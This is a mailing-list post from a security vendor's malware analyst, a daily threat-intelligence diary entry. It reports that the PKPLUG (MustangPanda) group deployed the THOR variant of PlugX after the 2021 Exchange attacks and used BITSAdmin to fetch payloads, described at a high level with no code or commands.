[MART] - Daily Diary #314 - PKPLUG Group Is Using The THOR RAT in Recent Attacks
CTAS-MAT
ctas-mat at appgate.com
Wed Jul 28 22:12:24 UTC 2021
Hello,
I hope everyone is doing well!
Below is the entry for today.
07/28/2021 - Diary entry #314:
The PKPLUG group, also known as MustangPanda and HoneyMyte, is a chinese threat actor responsible for the Microsoft Exchange Server attacks in March, 2021. During these attacks, the group deployed a variant of the malware known as PlugX, named THOR.
THOR is a RAT and it was used as a post exploitation tool on one of the compromised servers. This variant has the ability to deliver other malicious payloads and it has several samples associated to the PlugX C&C infrastructure.
To bypass anitiviruses detections and the Microsoft Exchange servers, the group employed a technique called "living off the land", covered in our Daily Diary #247. It uses legitimate binaries, in this case the BITSAdmin, to download the malicious payload containing the THOR malware.
Kind Regards,
[https://d3aafpijpsak2t.cloudfront.net/images/Signature/logo@2x.png]<https://www.appgate.com/>
[https://d3aafpijpsak2t.cloudfront.net/images/Signature/likedin@2x.png]<https://www.linkedin.com/company/appgate-security/> [https://d3aafpijpsak2t.cloudfront.net/images/Signature/twitter@2x.png] <https://twitter.com/AppgateSecurity> [https://d3aafpijpsak2t.cloudfront.net/images/Signature/youtube@2x.png] <https://www.youtube.com/channel/UC-8GvxcZbm-R3EJNl8jYjiQ>
Felipe Tarijon de Almeida
Malware Analyst
Appgate
E: felipe.tarijon at appgate.com<mailto:felipe.duarte at appgate.com>
O: +55 11 97467 9549
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.immunityinc.com/pipermail/mart/attachments/20210728/26a577dc/attachment.htm>
More information about the MART
mailing list